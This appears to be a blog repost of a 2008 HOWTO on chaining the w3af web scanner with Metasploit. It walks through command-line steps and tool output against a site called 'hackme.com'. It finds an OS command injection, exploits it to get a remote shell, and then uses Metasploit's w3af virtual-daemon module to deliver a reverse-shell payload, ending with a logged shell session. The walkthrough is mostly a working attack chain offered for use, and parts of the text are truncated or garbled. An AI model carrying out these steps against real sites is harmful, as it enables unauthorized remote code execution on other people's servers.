Jumat, 19 Desember 2008

HOWTO-Integrate w3af with Metasploit

HOWTO-Integrate w3af with Metasploit

Summary: This is how to explain how the process of execution of payloads and exploit the tool
First of all, please read the user's guide , this series of HOWTO documents don't replace the documentation, which gives a much more general knowledge of the framework and it's features. With that said lets start with the steps you have to follow in order to advanced exploiting:

Note: To use this feature we have installed the Metasploit framework version 3.0 or higher; can get free from the official
site www.metasploit.com, installation and configuration of MSF is not in the scope of this HOWTO.
• STEP1 - To use the virtual daemon is necessary to run the tool with the following parameter:
# ./w3af -i /home/user/workspace/msf/
Successfully installed Virtual Daemon.
It is important to mention that the path "/home/user/workspace/msf/" is the directory where you installed the
We can see this in w3af execution with virtual daemon installed.
• STEP2 - Using plugins discovery will try to identify the various points of injections. In this example we will use the following:
w3af>>>plugins discovery allowedMethods webSpider
w3af>>>target set target http://www.hackme.com/
The following is a list of that were found by the webSpider plugin:
- http://www.hackme.com/dina2.jpg [ http://www.hackme.com/ ]
- http://www.hackme.com/tg.gif [ http://www.hackme.com/ ]
- http://www.hackme.com/pagead/show_ads.js [ http://www.hackme.com/ ]
- http://www.hackme.com/stats.asp [ http://www.hackme.com/ ]
- http://www.hackme.com/urchin.js [ http://www.hackme.com/ ]
- http://www.hackme.com/pub/shockwave/cabs/flash/swflash.cab [ http://www.hackme.com/ ]
- http://www.hackme.com/poetry/bienvenue.php [ http://www.hackme.com/ ]
- http://www.hackme.com/js/counter.js [ http://www.hackme.com/ ]
- http://www.hackme.com/loose.dtd [ http://www.hackme.com/ ]
Found 3 URLs and 3 different points of injection.
The list of URLs is:
- http://www.hackme.com/
- http://www.hackme.com/index.php?ir=results.php&page=1
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php
The list of fuzzable requests is:
- http://www.hackme.com/ | Method: GET
- http://www.hackme.com/index.php?ir=results.php&page=1 | Method: POST | Parameters: (search)
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php | Method: POST | Parameters: (autor)
As a result we have discovered some URLs, which could contain vulnerabilities. A special case is the "index.php" file which has the query string parameter "page". Let's see how ...
• STEP3 - Activating the osCommanding audit plugin, and setting the target URL http://www.hackme.com/index.php?ir=result.php&page=hack%%
w3af>>>target set target http://www.hackme.com/index.php?ir=result.php&page=hack%%
w3af>>>plugins audit osCommanding
Found 3 URLs and 3 different points of injection.
The list of URLs is:
- http://www.hackme.com/index.php
- http://www.hackme.com/index.php?ir=results.php&page=1
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php
The list of fuzzable requests is:
- http://www.hackme.com/index.php | Method: GET | Parameters: (ir,page)
- http://www.hackme.com/index.php?ir=results.php&page=1 | Method: POST | Parameters: (search)
- http://www.hackme.com/index.php?ir=amazon/amazon.tena.php | Method: POST | Parameters: (autor)
Starting osCommanding plugin execution.
100% [====================================================] 3/3
A possible OS Commanding was found at: http://www.hackme.com/index.php . Using method: GET. The data sent was: ir=run+ping+-n+3+localhost&page=hack%% . Please review manually. This information was found in the request with id 58.
By changing in unexpected ways to implement the value received by the URL (page = hack%%) we can see that the web service is not properly validating the value.
Knowing this we can take control of the application and execute arbitrary code including a file to another server.
• STEP4 - Exploit the vulnerability identified using plugins exploit.
w3af>>>exploit exploit *
Using plugin: osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited
No [blind] sql injection vulnerabilities have been found.
Hint #1: Try to find vulnerabilities using the audit plugins.
Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.
Using plugin: googleProxy
google proxy listening on
Vulnerability successfully exploited.
This is a list of available shells:
- [0]
- [1]
Please use the interact command to interact with the shell objects.
I get a list of available shells. Interact With the command shell that could select run.
3af/exploit>>> interact 1
Execute "endInteraction" to get out of the remote shell. Commands typed in
this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell-1>>> whoami

• STEP5 - Launch Virtual Daemon and integrate Metasploit.
w3af/exploit/osCommandingShell-1>>> start vdaemon
Virtual daemon service is running on port 9091, use metasploit's w3af_vdaemon module to exploit it.

• STEP6 - Start tool Metasploit Framework Web Console and configure the Virtual exploit w3af Daemon exploit.
root@nb:/home/user/workspace/mfs# ./msfweb

[*] Starting msfweb v3.2-release on

=> Booting WEBrick...
[*] WEBrick directory traversal patch loaded
=> Rails application started on
=> Ctrl-C to shutdown server; call with --help for options
[2008-05-28 17:50:13] INFO WEBrick 1.3.1
[2008-05-28 17:50:13] INFO ruby 1.8.6 (2007-06-07) [i486-linux]
[2008-05-28 17:50:13] INFO WEBrick::HTTPServer#start: pid=11541 port=55555
Once we have the service up, enter the browser and put the port that this listening msf, http://localhost:55555.
After clicking on "Exploit" on the main menu, you'll see a small window where we can find the name of the writ (w3af) and select as shown in following picture.

We select the operating system and payloads to run. At this stage we must indicate certain parameters: rhost (IP addresses to attack), Lhoste (publicIPaddress),LPORT(portwhichitwillusetoconnect).

By completing the parameters we can run it by clicking on Launch Exploit. You get a window showing detailed process. If this is successful

And get shell !!!
[*] Started reverse handler
[*] The remote ip address is:
[*] Using remote IP address to create payloads.
[*] Sent payload to vdaemon.
[*] The estimated time to wait for the extrusion scan to complete is: 1 seconds.
[*] Done waiting!
[*] The estimated time to wait for PE/ELF transfer is: 8 seconds.
[*] Waiting...
[*] Done waiting!
[*] Going to wait for 27 seconds (waiting for crontab/at to execute payload).
[*] The session could start before the handler, so please *be patient*.
[*] Command shell session 1 opened ( ->
[*] Done waiting!
[*] Starting handler
Portions not contributed by visitors are Copyright 2008 Tangient LLC.

Tidak ada komentar: